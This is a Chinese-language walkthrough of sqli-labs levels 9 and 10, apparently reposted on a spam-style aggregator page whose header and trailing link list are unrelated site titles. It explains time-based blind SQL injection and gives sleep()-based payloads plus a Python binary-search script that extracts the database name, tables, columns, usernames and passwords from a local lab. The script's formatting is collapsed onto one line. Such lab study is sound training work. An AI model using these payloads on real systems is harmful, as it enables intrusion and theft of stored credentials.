当前位置: 首页 > news >正文

郑州搭建网站公司wordpress手动装插件

news 2025/9/18 0:16:31
郑州搭建网站公司,wordpress手动装插件,wordpress文章图片批量删除,手机微网站模板下载第九关: 这一关相比第八关,第八关他正确显示you are in,错误不显示you are in,但是第九关你不管是输入正确或者错误都显示 you are in ,这个时候布尔盲注就不适合我们用,所以我们的换一下思路,布尔盲注适合页面对于错误和正确结果…

第九关:

这一关相比第八关,第八关他正确显示you are in,错误不显示you are in,但是第九关你不管是输入正确或者错误都显示 you are in ,这个时候布尔盲注就不适合我们用,所以我们的换一下思路,布尔盲注适合页面对于错误和正确结果有不同反应。如果页面一直不变这个时候我们可以考虑使用时间盲注。

判断注入点

             基于时间的注入(延时注入)

             1. Time-based blind SQL injection
                2.利用前提:页面没有显示位,也没有输入SQL语句执行错误信息,正确的SQL语句和错误的返回页面都一样,但
                是加入sleep(5)条件后,正确的SQL语句页面返回速度明显慢了5秒,错误的SQL语句立即返回。
                3.优点:不需要显示位,不需要报错信息。
                4.缺点:速度慢,耗费大量时间
                5.用法:IF(Condition,A,B)函数
                当Condition为TRUE时,返回A;否则返回B。     
                6.示例:    SELECT * FROM users WHERE id=1 AND IF(ASCII(SUBSTR(USER(),1,1))>65 ,SLEEP(5),1);     
 

?id=1' and sleep(3) --+          有明显延迟
?id=1" and sleep(3) --+          无延迟
?id=1') and sleep(3) --+         无延迟

说明这里的闭合是单引号。   位数暂时不判断了,用脚本的话不需要位数

当请求错误时,延迟时间在3S以后

当请求正确时,延迟时间很短,在3S以内

基于这个我们就可以写脚本来帮助我们注入

import time
import requests
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
#二分法
def inject_database(url):name=""for i in range(1,20):low =32high = 128mid = (low + high) // 2while low < high:payload = "1' and if(ascii(substr(database(),%d,1)) > %d,sleep(1),0)-- " % (i, mid)params = {"id": payload}start_time = time.time()r = requests.get(url,params=params)end_time = time.time()if end_time - start_time >= 1:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname += chr(mid)print(name)inject_database(url)

有点慢,但是也是成功拿下数据

下边的操作和之前的一样

爆表

payload = "1' and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='security'),%d,1)) > %d,sleep(1),0)-- " % (i, mid) 

爆字段

payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d,sleep(1),0)-- " % (i, mid)

username,password

payload = "1' and if(ascii(substr((select group_concat(username) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d,sleep(1),0)-- " % (i, mid)

            payload = "1' and if(ascii(substr((select group_concat(password) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d,sleep(1),0)-- " % (i, mid)

拿下

第十关:

和第九关不一样的就是这里是双引号

还是时间盲注,稍微修改,直接使用

 

成功拿到数据库 ,后边的操作都是如法炮制!!!

http://www.yayakq.cn/news/223573/

相关文章:

  • 沧州瑞智网站建设网站的做代理商
  • 设计公司网站源码织梦网站打开慢
  • asp.net网站开发之美菜鸟教程python
  • 广东网站建设公司电话企业网站首页怎么优化
  • 建站之星管理中心开发前端后端
  • Django 个人博客网站开发陕西网络公司
  • 网站换服务器 备案响应式网站做seo
  • 东城企业网站建设亚马逊官网首页中国
  • 网站首页一般做多大尺寸用wordpress搭建娱乐网
  • 网站建设朱宁多用户商城系统的售后
  • 鲁班建设网站深圳 网站建设培训
  • 电子商务网站名称和网址国外游戏商城网站欣赏
  • wordpress文章推荐seo推广哪家好
  • 网站背景基于工作过程的商务网站建设 网页制作
  • 中国建设银行人力资源网站腾讯云轻量云服务器
  • 凡科建站官网 网络服务seo优化网站优化
  • 专业网站建设推荐旅游网站功能模块
  • 网站建设要费用多少温州seo关键词
  • 怎么在ftp看网站后台地址怎样做网站推广啊视频
  • 手机网站弹出提示框软装公司网站建设
  • 毕节市网站建设58同城企业名录数据库
  • 国内地铁建设公司网站做网赌网站怎么推广拉人
  • 网站建设相关法律做网站的是什么工种
  • 专业做鞋子网站如何免费引流推广
  • wordpress 接口做360手机网站优化快
  • 三水区网站建设常平小学网站建设
  • 传奇世界新开服网站男科医院排名最好的医院
  • 哪个网站做logo设计师无锡手工活外发加工网
  • 苏州公司网站建设找哪家北京建设监理协会官方网站
  • 做俄罗斯外贸网站wordpress主题怎么添加视频播放器